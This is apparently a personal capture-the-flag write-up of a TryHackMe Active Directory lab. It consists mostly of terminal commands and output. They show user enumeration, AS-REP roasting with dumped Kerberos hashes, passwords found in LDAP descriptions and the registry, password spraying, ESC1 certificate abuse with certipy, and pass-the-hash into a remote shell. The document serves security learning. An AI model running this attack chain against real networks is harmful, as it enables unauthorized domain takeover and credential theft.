SMB 10.10.16.173 445 LABYRINTH 1602: THM\JANET_WALLS (SidTypeUser)
SMB 10.10.16.173 445 LABYRINTH 1603: THM\ELVIRA_PITTMAN (SidTypeUser)
Linux-Fu the output into a user list.
┌──(kali㉿kali)-[~/thm/ledger]
└─$ sed -n 's/.*\\\([^ ]*\) (SidTypeUser)/\1/p' nxc_rid.brute > nxc_rid_brute ; cat nxc_rid_brute ; echo '' ;wc -l nxc_rid_brute
Administrator
Guest
krbtgt
LABYRINTH$
greg
SHANA_FITZGERALD
CAREY_FIELDS
DWAYNE_NGUYEN
BRANDON_PITTMAN
BRET_DONALDSON
VAUGHN_MARTIN
DICK_REEVES
EVELYN_NEWMAN
SHERI_DYER
NUMBERS_BARRETT
SUSANA_LOWERY
MIKE_TODD
JOSEF_MONROE
DAWN_DAVID
VIVIAN_VELAZQUEZ
WESLEY_FULLER
MARISOL_LANG
DIONNE_MCCOY
NOEL_BOOTH
TAMRA_BULLOCK
ROLAND_COLE
KATHY_WYNN
LORENA_BENSON
FELIX_CHARLES
ROBERTO_MORIN
VICTOR_WALTERS
AL_HAMPTON
RAYMUNDO_HOLLOWAY
FRANKIE_ASHLEY
DUANE_DRAKE
CODY_ROY
ANDERSON_CARDENAS
ARIEL_SYKES
DION_SANTOS
LAVERN_GOODWIN
BRENTON_HENRY
ROB_SALAZAR
RITA_HOWE
LETITIA_BERG
CECILE_PATRICK
PRINCE_HOFFMAN
KURT_GILMORE
JASPER_GARDNER
YVONNE_NEWTON
SHELLEY_BEARD
SILAS_WALLS
AMOS_MCPHERSON
DIEGO_HARTMAN
DINO_CARSON
JOSHUA_MOSLEY
HESTER_MCMAHON
MARJORIE_QUINN
LOU_BENNETT
LOU_CANTRELL
KERRY_JOHNSON
DIANE_ROWE
RANDY_HOWELL
WALDO_HOUSTON
FANNY_RIVERA
ANNMARIE_RANDALL
VIOLET_MEJIA
MARVA_CALLAHAN
AMOS_LEONARD
STELLA_RIVERS
JEROME_FERRELL
74820323SA
DERICK_BLEVINS
JANELL_GREGORY
SPENCER_DODSON
MILAGROS_HOGAN
LIZA_DALE
ADOLPH_PUCKETT
BRANDIE_GRANT
EVERETTE_HUFFMAN
RITA_BRADFORD
ISIAH_WALKER
IRWIN_MOON
569434710SA
SUZANNE_GREENE
FAUSTINO_SCHROEDER
ANNETTE_HUBER
ANTON_HODGES
HILARIO_HAYNES
TANYA_COOK
KIM_SCOTT
DEANNE_STOKES
ALINE_BROWN
6643765058SA
DICK_CONRAD
SHANNON_BOWMAN
OLGA_VANG
MABLE_FORD
NONA_MARSH
ZELMA_HERRERA
LOU_CHAN
CONNIE_BARKER
8429491684SA
JAIME_KNAPP
STELLA_FLYNN
RUSS_WEISS
LILIA_HICKS
ELTON_WIGGINS
JULIA_RIOS
RUBIN_BANKS
QUEEN_GARNER
CHESTER_LONG
JERRI_LANCASTER
IDA_ORR
SETH_MCKAY
SAMANTHA_MILLS
GARLAND_HORTON
ALPHONSE_HICKMAN
ANGELO_CASH
CELINA_FISHER
CHRISTIAN_SANFORD
KRIS_BARNES
7063939681SA
GLENNA_GRAY
JOSHUA_SIMMONS
KIRBY_CLARK
TEDDY_HEATH
PHYLLIS_MERCER
KATE_TODD
3513161954SA
SUZETTE_NORMAN
KARYN_CLARK
KATHRYN_BARRETT
PATSY_FULTON
ROSIE_CORTEZ
GRACIE_HAYNES
HUGO_EATON
SEAN_MARTIN
MAI_BARLOW
BERNARD_CARNEY
DARCY_MARSHALL
CHANDRA_HINTON
DEVIN_EMERSON
JEAN_BURNS
LOYD_CARNEY
ERICKA_COFFEY
LISA_GREENE
AUGUST_MCCRAY
ARNULFO_MCKENZIE
WILFREDO_BARTON
VITO_CRAIG
GIOVANNI_WELLS
VONDA_DUFFY
SHERYL_MCDANIEL
JANINE_MARKS
PHYLLIS_MCCOY
AMADO_WITT
LAURENCE_HAMILTON
LORRIE_AVERY
JAMAR_TATE
MATHEW_MAYER
DEAN_YOUNG
SHERYL_STOUT
JOSUE_BURNETT
LORETTA_PATTERSON
COLBY_MALDONADO
WHITNEY_NORTON
MONIQUE_FUENTES
MARION_MERRITT
REID_GILBERT
WILTON_LARSEN
MERLE_FRANKS
GUY_MORRIS
ALI_HOLLAND
EULA_FERGUSON
EDWARD_SIMS
SUSANNA_HERRING
FAYE_ORTEGA
WILTON_ROMERO
EMILY_ATKINSON
STACIE_FLETCHER
ART_SMALL
5103729844SA
FAYE_JARVIS
ROBIN_SALAS
BESSIE_LUCAS
PEGGY_MCCRAY
JOHNATHAN_CAMPOS
FAYE_MENDEZ
MAMIE_DOWNS
GAVIN_HUDSON
MARCI_CARRILLO
JOHN_SWEET
RANDOLPH_BURKS
KELSEY_BRADFORD
ZACHARY_HAMMOND
GARRY_GORDON
MALLORY_HAYNES
JULIETTE_KEY
IMOGENE_WHITEHEAD
GLENNA_LEE
SIMONE_MCKINNEY
KELLIE_CUMMINGS
ROXANNE_ATKINS
RUPERT_HAYES
ALISSA_HICKMAN
SIMONE_MORRISON
9885253046SA
ANTHONY_ROSARIO
INA_GRIMES
BURT_SHERMAN
MARCEL_WHITEHEAD
SANFORD_DAUGHERTY
ELVIS_CLAYTON
SON_COMBS
JERALD_MARQUEZ
JOSIAH_HALE
495693942SA
ANTOINETTE_VINCENT
AUSTIN_PADILLA
DEWAYNE_CRAIG
DANA_BATES
MARCUS_POWERS
MIRIAM_PARK
ANDY_FARRELL
BOBBIE_MEYER
KERI_REYES
JONAS_CARROLL
MITCHELL_BRADY
MADGE_HAMMOND
NORMAN_ROBLES
CHRISTINA_BLACKBURN
DALLAS_BYRD
TAYLOR_CAIN
IRVIN_PITTS
PIERRE_MORRIS
BART_TRAN
LESTER_WALTER
MACK_ABBOTT
SELMA_BLANCHARD
DINA_YORK
AMADO_OCONNOR
SAVANNAH_GILL
CRISTINA_ELLISON
2974122699SA
MORGAN_BARRERA
DONA_FARRELL
DEANNE_VILLARREAL
KATHARINE_VELAZQUEZ
BRADLEY_ORTIZ
CATALINA_WALLS
EDWARDO_MITCHELL
ANGELA_GREEN
EBONY_PECK
6523676673SA
ESPERANZA_WEEKS
MICHAEL_MCKENZIE
MAGDALENA_GATES
STELLA_SNOW
2302150644SA
DICK_WELLS
DAISY_PACE
DINO_SHARPE
ALVIN_BRYAN
JESS_FULLER
NICHOLE_MOON
ALVA_HOUSTON
OFELIA_HIGGINS
KIMBERLY_FOSTER
ALPHONSE_CARPENTER
ANNA_PARRISH
POLLY_PATEL
CATHLEEN_ROTH
AVERY_NEAL
KATHRINE_ALLEN
LEONARDO_BARNES
DANNIE_MEJIA
JULIO_CASH
REBA_TUCKER
VICKI_FARMER
ELIAS_CRAIG
PENELOPE_WHITFIELD
JULIE_JEFFERSON
KIRBY_BARTLETT
CHRISTY_MADDOX
RICO_BOND
FRANCIS_PHELPS
HAZEL_TREVINO
MACK_RAYMOND
SHANNA_LLOYD
BESSIE_CHAN
JOAQUIN_MENDEZ
MICHEL_DUFFY
JOSH_LOVE
DEIDRE_CORTEZ
LENORA_HURLEY
575134123SA
MARISOL_TYSON
KARINA_BLACKBURN
COLIN_ATKINS
101551296SA
WINFRED_JUAREZ
ELWOOD_SOLOMON
JUANA_BEAN
MARVA_BEAN
VERA_SCOTT
BERYL_PETERSEN
PRINCE_HOBBS
EMIL_WHITEHEAD
LIDIA_FRANK
DENVER_NOEL
NICHOLE_MORSE
JACKIE_HATFIELD
SHELDON_RICHARDSON
ZACHARY_HUNT
MERLIN_HARPER
SALVATORE_DODSON
KRISTINE_RIDDLE
BRAD_HOWE
JOANN_LOTT
TERI_SINGLETON
REBA_CLAY
ANNA_EVANS
HELENE_KIRK
EDUARDO_BYRD
GERARDO_MCCALL
MELINDA_OLSON
PAULINE_VEGA
THURMAN_WOODWARD
DANNIE_ROBERTSON
ESTHER_SIMS
RUFUS_HUFF
GINGER_PATTERSON
LELA_CAMPBELL
LOLITA_ROY
PHIL_CLARKE
KRIS_BRYAN
SYLVIA_SANDERS
SHIRLEY_KELLY
SHERI_CASEY
GAVIN_MARKS
MADELYN_GAINES
2152985366SA
ALANA_GILLIAM
FRANCESCA_MONTOYA
ERVIN_BAXTER
MABEL_BURRIS
BLAKE_GRIFFITH
TAMMI_COOPER
CURTIS_OLSON
KATE_OCHOA
CARROLL_HARRISON
AUBREY_DILLARD
JOSEFA_TRAN
NATALIE_BRADFORD
FRED_DOTSON
MORTON_BURNS
IVY_WILLIS
SOFIA_PATTERSON
JANE_FOLEY
PEARL_FULLER
GUADALUPE_TURNER
VIVIAN_HARPER
VICENTE_BURT
DIXIE_BERGER
LIZ_WALTER
SUSANNA_MCKNIGHT
LILY_LYONS
WALDO_BOYER
SAL_ALVAREZ
ROBBIE_DUDLEY
MAXINE_FREEMAN
MANUEL_BENJAMIN
JERRY_HUMPHREY
ANTON_WILLIAMSON
TAD_STOKES
ELWOOD_TATE
KERRY_NEAL
CONSTANCE_HOPPER
GERRY_OSBORNE
HORACIO_WEBER
ANDRES_BRADLEY
ELVIRA_KOCH
DENNIS_BOONE
CORINE_HINTON
TRACEY_BRADY
LEON_THOMPSON
JANINE_SPEARS
LESTER_WITT
HOLLY_GRAVES
NORMA_BARRON
RONDA_BURT
KATIE_GOODMAN
ROBBY_FRANKLIN
ZACHARIAH_WARNER
SUSIE_WORKMAN
BENITA_MCKNIGHT
LEA_MERRILL
RUTHIE_AVERY
DUANE_DODSON
KIRK_CRAFT
AARON_SANDERS
ALLYSON_BANKS
INEZ_LEVY
JESUS_MOSS
ESTELLE_JOHNS
MANUELA_DELEON
BRANT_DOUGLAS
ARACELI_DEJESUS
RODNEY_DUKE
LILIA_BARLOW
MARGARITO_HAMILTON
ISSAC_SERRANO
PETRA_BLANKENSHIP
5998682031SA
JACKIE_WEAVER
KELSEY_SNYDER
ROCKY_WEBB
COLEEN_YATES
GERARD_SULLIVAN
ALDO_ASHLEY
DALLAS_WARNER
SCOT_GEORGE
STERLING_TREVINO
JOSEF_GOOD
JEFFREY_SCHULTZ
IRVIN_COHEN
ISRAEL_BENDER
JULES_GRIFFIN
RANDAL_PAYNE
JOHNNIE_GARCIA
TRISTAN_KIDD
HEATH_RANDALL
KITTY_WOODWARD
BRANDEN_MYERS
WINNIE_FISCHER
ESPERANZA_VINCENT
BRIGITTE_BRITT
KASEY_MORRISON
FRITZ_SHIELDS
KERRY_CLARKE
MAURICE_MOSES
EDWARDO_ATKINSON
STELLA_DODSON
HOMER_SHARP
GEORGETTE_HATFIELD
SELMA_WATSON
CAROLINA_HULL
MOLLIE_VARGAS
CLAUDETTE_FRYE
PRINCE_GALLEGOS
ABDUL_BUCKNER
ORVAL_GRIFFITH
SANDY_NAVARRO
JANIE_PITTMAN
TERRIE_DALE
MATHEW_WALTER
ALBERTO_FULLER
DOLLIE_BUSH
LINDSAY_BECK
RUTHIE_MACIAS
LORRAINE_EWING
SAMANTHA_BARNES
DEANA_RIVAS
CLARICE_PITTS
MADELINE_GALLOWAY
GUILLERMO_CHASE
SEBASTIAN_REESE
MIGUEL_COLLIER
TERRY_OCHOA
MARIE_VALDEZ
DIANA_HOLMAN
CYNTHIA_VALDEZ
JANINE_HEBERT
MARINA_MAYER
JEANETTE_COFFEY
RICKY_STEVENS
DERRICK_LUNA
SUSANNE_BROWNING
BEVERLY_FARRELL
JOAQUIN_STEVENSON
ESTHER_PUCKETT
JEROME_DUDLEY
BETH_MUNOZ
CHI_HARDING
IRVIN_STRONG
LIONEL_BAILEY
TERRANCE_PRUITT
TAMI_HOBBS
RODOLFO_ASHLEY
PAULETTE_HEAD
DARRIN_HOLMES
JANET_WALLS
ELVIRA_PITTMAN
493 nxc_rid_brute
ASREP-ROASTING
We are able to get some hashes through asreproasting but we care unable to crack it.
┌──(kali㉿kali)-[~/thm/ledger]
└─$ nxc ldap 10.10.250.148 -u users.txt -p '' --asreproast output.txt
SMB 10.10.250.148 445 LABYRINTH [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False)
LDAP 10.10.250.148 445 LABYRINTH $krb5asrep$23$PHYLLIS_MCCOY@THM.LOCAL:0a5e496afeefcedd1becf8918cc6883d$8440840fb6debf5de4d1f850a8a19115f2f4936338a034172fded0aec55c9b420e579dc6e6f79701c305f10d30c900e3c4c1b41327bce64afeb587cba3381fd328d894d971477eb0a55129d9605f672f5f9a07c7b23a0c8b56e37d07cda35955c33e6eed1a31fc2953f9a39bab6e7fd36e7a1c5236431f5b5c735b6ccc26ef7cb3f542d31a8a8913eaa2d1646b1a9674b5adb777dd396e7cb8d82693e6593485af44740fbb821250edc711861171ac770841d5e28886ce2af6806e74141f102331666ad98db9a83beec5355bbabb6ebf9e48cf82bcb7ddf8b2595ffe9912867e73ace345fd04
LDAP 10.10.250.148 445 LABYRINTH $krb5asrep$23$MAXINE_FREEMAN@THM.LOCAL:e3e3c2d3a16f218ed88eae4d8c446b78$207405036d87356824d3bc4c58609267eda983738e5329f41788d4971c8eaca6e75ba8916524d1604894dd16c119d0a236d0eaf450f3d86b173d95269c0243167eccf4961a4833c5f5d8f532934f4718d72cab5a9f82c84c64660eb0d088f10fabaa1f66b66f38a9a1153f68a98b663faf5670a5d220db3dd0e2e1e95e8140c36be141a45ac841ae6215a0851559164cef5ac3c37e4535fcd5073cd072e0db52f65f72d38ff7b7b85d7d157b5a68146b104e43521e7f7a36d35f062515e8cafc9b5dafd9402484e73964bfede77787be578b1e686183afda2a31696a60c8ba33909bc2a6edf1
LDAP 10.10.250.148 445 LABYRINTH $krb5asrep$23$ISIAH_WALKER@THM.LOCAL:686fc8d4073e3b37a1b781cc0c0fd3a5$83dbac9d8dcef32cda915c4d8cad4829458f1f06f1af16fb7d8657671634f90e9228f3f3f4fe8c81c5ebad176ab987095fe84ab813cd713efceebabacf97ea09faa0e209dc3070582519e55f8c3afb552dd5df1bba2f51e46c961117e2099f9603a6760cce1f1ad722bd1fb3c4d3982150c76c8bd9a8a432c9fa985c451bc0fdb805b248499bbbbe4eb28524802964afe222a101a5649d28a4d4e85aab27e2e047a9edbe2938f192a19c428cd3496e7a622e1386798b40872b7ed6d5267aaf0f059f658902a0497149d5645a1ec71227f456bf17370e6e0f9da0769a81aa87159e7974e350b9
LDAP 10.10.250.148 445 LABYRINTH $krb5asrep$23$QUEEN_GARNER@THM.LOCAL:bc2eb0a2b841c87e9ec8a85003efb945$e4339e29e48dc204aebafd2154b674c033dd5ce55a9c6663afaa6d56d6a18d8793d3c0226688a76c0484050ecfb45ef9cdf1c069dfd6e257601d25fc7808e0daecbb70a8930255e2b7a1b030e6e1b60907898c633632657878f5e57c7fdf67ebec60d55c1aa8de2e74578c83cd0269712776ed90b6ba07101bcae9a5524758ac6189b4c19e0e5fc704548323cbac1f700b9a05428f0cd8afbcf054fe716602a67240c9744a58915f0d14a003e4a0e77e01f063c41b8df7e1728fc66c2c2d1be7e00ce8705ac07027bee72c6df5b104e6b10bccc947825b27d2f065ec85ba0fc14f09b1d6ed6f
LDAP 10.10.250.148 445 LABYRINTH $krb5asrep$23$SHELLEY_BEARD@THM.LOCAL:ac3c774a65241923daf8a10acc1a6462$6c236c72c9c3036173fbd1e40b9243ecdfabdb8e67e5e228dc1b882647a0cf44b34b9499b2826721560cd497cb05364fa82ba0a155c1da29d012d11326a5e048c7f181fa4fd5e92bb67772b3388f22342c1c4d0ae80b840c764ad4e3009f0932e711666b4bd830e909248a2cef2834df6fc31d49f4cd0bbc56a244caa4616d59d8c6dcdf0f0a5409b4a1a10dd5e42eab8bd53c054ccf2ec79cadafacc905ec21413dd86c7bd3be8eda84d7e938125d15cdb2a93cc1070900f41fd16b5caef10f1864f52dcfa1536cfac58d3106664302a1828bddb85262d0efe32427d6b94a9ccfd023ea48c1 LDAP descriptions
LDAP pulled back user descriptions – found the same password reused for two accounts.
GET-DESC... 10.10.250.148 389 LABYRINTH User: IVY_WILLIS description: Please change it: xxxxxxxxxxxxx
GET-DESC... 10.10.250.148 389 LABYRINTH User: GUADALUPE_TURNER description: Tier 1 User
GET-DESC... 10.10.250.148 389 LABYRINTH User: LIZ_WALTER description: Tier 1 User
GET-DESC... 10.10.250.148 389 LABYRINTH User: SUSANNA_MCKNIGHT description: Please change it: xxxxxxxxxxxxx
GET-DESC... 10.10.250.148 389 LABYRINTH User: LILY_LYONS description: Tier 1 User
GET-DESC... 10.10.250.148 389 LABYRINTH User: JERRY_HUMPHREY description: Tier 1 User
GET-DESC... 10.10.250.148 389 LABYRINTH User: ANTON_WILLIAMSON description: Tier 1 User
SMB 10.10.250.148 445 LABYRINTH [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False)
SMB 10.10.250.148 445 LABYRINTH [+] thm.local\IVY_WILLIS:xxxxxxxxxxxxx
SMB 10.10.250.148 445 LABYRINTH [+] thm.local\SUSANNA_MCKNIGHT:xxxxxxxxxxxxx
LDAPDomainDump revealed a user account where we could RDP in using the credentials we found. Successful login – we’re now inside the network.
mkdir ldapdomaindump;cd ldapdomaindump;python3 /usr/bin/ldapdomaindump -u thm.local\\IVY_WILLIS -p 'xxxxxxxxxxxxx' ldap://10.10.250.148
mkdir: cannot create directory ‘ldapdomaindump’: File exists
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
Foothold
After landing inside the initial user, we dug through registry keys and found plaintext passwords. Spraying them gave us a hit on ‘greg’, but runas attempt is a dead end. No further movement from here.
C:\Users\SUSANNA_MCKNIGHT>reg query "HKLM\SOFTWARE\microsoft\windows nt\currentversion\winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\microsoft\windows nt\currentversion\winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DisableBackButton REG_DWORD 0x1
EnableSIHostIntegration REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x7bee3fd056
ShutdownFlags REG_DWORD 0x80000027
ShellAppRuntime REG_SZ ShellAppRuntime.exe
DisableLockWorkstation REG_DWORD 0x0
DefaultDomainName REG_SZ THM
New Value #1 REG_SZ
New Value #2 REG_SZ
New Value #3 REG_SZ
AutoAdminLogon REG_SZ 1
DefaultPassword REG_SZ Passw0rd
DefaultUserName REG_SZ andrea
AutoLogonSID REG_SZ S-1-5-21-1966530601-3185510712-10604624-1112
LastUsedUsername REG_SZ andrea
HKEY_LOCAL_MACHINE\SOFTWARE\microsoft\windows nt\currentversion\winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\microsoft\windows nt\currentversion\winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\microsoft\windows nt\currentversion\winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\microsoft\windows nt\currentversion\winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\microsoft\windows nt\currentversion\winlogon\VolatileUserMgrKey──(kali㉿kali)-[~/thm/ledger]
└─$ nxc smb 10.10.250.148 -u nxc_rid_brute -p 'Passw0rd' --continue-on-success
SMB 10.10.250.148 445 LABYRINTH [*] Windows 10 / Server 2019 Build 17763 x64 (name:LABYRINTH) (domain:thm.local) (signing:True) (SMBv1:False)
SMB 10.10.250.148 445 LABYRINTH [-] thm.local\Administrator:Passw0rd STATUS_ACCOUNT_RESTRICTION
SMB 10.10.250.148 445 LABYRINTH [-] thm.local\Guest:Passw0rd STATUS_LOGON_FAILURE
SMB 10.10.250.148 445 LABYRINTH [-] thm.local\krbtgt:Passw0rd STATUS_LOGON_FAILURE
SMB 10.10.250.148 445 LABYRINTH [-] thm.local\LABYRINTH$:Passw0rd STATUS_LOGON_FAILURE
SMB 10.10.250.148 445 LABYRINTH [+] thm.local\greg:Passw0rd
SMB 10.10.250.148 445 LABYRINTH [-] thm.local\SHANA_FITZGERALD:Passw0rd STATUS_LOGON_FAILURE
SMB 10.10.250.148 445 LABYRINTH [-] thm.local\CAREY_FIELDS:Passw0rd STATUS_LOGON_FAILURE
SMB 10.10.250.148 445 LABYRINTH [-] thm.local\DWAYNE_NGUYEN:Passw0rd STATUS_LOGON_FAILURE
SMB 10.10.250.148 445 LABYRINTH [-] thm.local\BRANDON_PITTMAN:Passw0rd STATUS_LOGON_FAILURE
C:\Users\SUSANNA_MCKNIGHT>whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON Well-known group S-1-5-14 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192Privilege Escalation
The current user belongs to the Certificate Service DCOM Access group, letting us interact with AD CS. Using Certipy-AD, we’ll enumerate certificate templates for misconfigurations, particularly ESC1 or ESC8 vulnerabilities,then request a forged certificate to escalate privileges. If we find template issues, we can generate a valid cert granting domain admin access.
certipy-ad find -u SUSANNA_MCKNIGHT -p 'xxxxxxxxxxxxx' -dc-ip 10.10.124.0 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 14 enabled certificate templates
[*] Trying to get CA configuration for 'thm-LABYRINTH-CA' via CSRA
[!] Got error while trying to get CA configuration for 'thm-LABYRINTH-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'thm-LABYRINTH-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'thm-LABYRINTH-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : thm-LABYRINTH-CA
DNS Name : labyrinth.thm.local
Certificate Subject : CN=thm-LABYRINTH-CA, DC=thm, DC=local
Certificate Serial Number : 5225C02DD750EDB340E984BC75F09029
Certificate Validity Start : 2023-05-12 07:26:00+00:00
Certificate Validity End : 2028-05-12 07:35:59+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : THM.LOCAL\Administrators
Access Rights
ManageCertificates : THM.LOCAL\Administrators
THM.LOCAL\Domain Admins
THM.LOCAL\Enterprise Admins
ManageCa : THM.LOCAL\Administrators
THM.LOCAL\Domain Admins
THM.LOCAL\Enterprise Admins
Enroll : THM.LOCAL\Authenticated Users
Certificate Templates
0
Template Name : ServerAuth
Display Name : ServerAuth
Certificate Authorities : thm-LABYRINTH-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : THM.LOCAL\Domain Admins
THM.LOCAL\Domain Computers
THM.LOCAL\Enterprise Admins
THM.LOCAL\Authenticated Users
Object Control Permissions
Owner : THM.LOCAL\Administrator
Write Owner Principals : THM.LOCAL\Domain Admins
THM.LOCAL\Enterprise Admins
THM.LOCAL\Administrator
Write Dacl Principals : THM.LOCAL\Domain Admins
THM.LOCAL\Enterprise Admins
THM.LOCAL\Administrator
Write Property Principals : THM.LOCAL\Domain Admins
THM.LOCAL\Enterprise Admins
THM.LOCAL\Administrator
[!] Vulnerabilities
ESC1 : 'THM.LOCAL\\Domain Computers' and 'THM.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
1
Template Name : Computer2
Display Name : Computer2
Enabled : False
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : 16842752
Extended Key Usage : Server Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : THM.LOCAL\Domain Admins
THM.LOCAL\Domain Computers
THM.LOCAL\Enterprise Admins
THM.LOCAL\Authenticated Users
Object Control Permissions
Owner : THM.LOCAL\Administrator
Write Owner Principals : THM.LOCAL\Domain Admins
THM.LOCAL\Enterprise Admins
THM.LOCAL\Administrator
Write Dacl Principals : THM.LOCAL\Domain Admins
THM.LOCAL\Enterprise Admins
THM.LOCAL\Administrator
Write Property Principals : THM.LOCAL\Domain Admins
THM.LOCAL\Enterprise Admins
THM.LOCAL\Administrator
[!] Vulnerabilities
ESC1 : 'THM.LOCAL\\Domain Computers' and 'THM.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
certipy-ad req -u SUSANNA_MCKNIGHT@thm.local -p 'xxxxxxxxxxxxx' -upn BRADLEY_ORTIZ@thm.local -target thm.local -ca thm-LABYRINTH-CA -template ServerAuth -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence '\('
"(0x[a-zA-Z0-9]+) \([-]?[0-9]+ ",
[+] Trying to resolve 'thm.local' at '8.8.8.8'
[+] Trying to resolve 'THM.LOCAL' at '8.8.8.8'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.124.0[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.124.0[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 25
[*] Got certificate with UPN 'BRADLEY_ORTIZ@thm.local'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'bradley_ortiz.pfx'┌──(kali㉿kali)-[~/thm/ledger]
└─$ sudo ntpdate -u thm.local
2025-05-08 08:31:30.589807 (-0400) +7.115275 +/- 0.091949 thm.local 10.10.124.0 s4 no-leap
CLOCK: time stepped by 7.115275
┌──(kali㉿kali)-[~/thm/ledger]
└─$ certipy-ad auth -pfx bradley_ortiz.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: bradley_ortiz@thm.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'bradley_ortiz.ccache'
[*] Trying to retrieve NT hash for 'bradley_ortiz'
[*] Got hash for 'bradley_ortiz@thm.local': xxxxxxxxxxxxx:xxxxxxxxxxxxx
──(kali㉿kali)-[~/thm/ledger]
└─$ impacket-wmiexec -hashes xxxxxxxxxxxxx:xxxxxxxxxxxxx THM.LOCAL/bradley_ortiz@labyrinth.thm.local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
thm\bradley_ortiz
C:\>hostname
labyrinth
Persecure : my learning archive 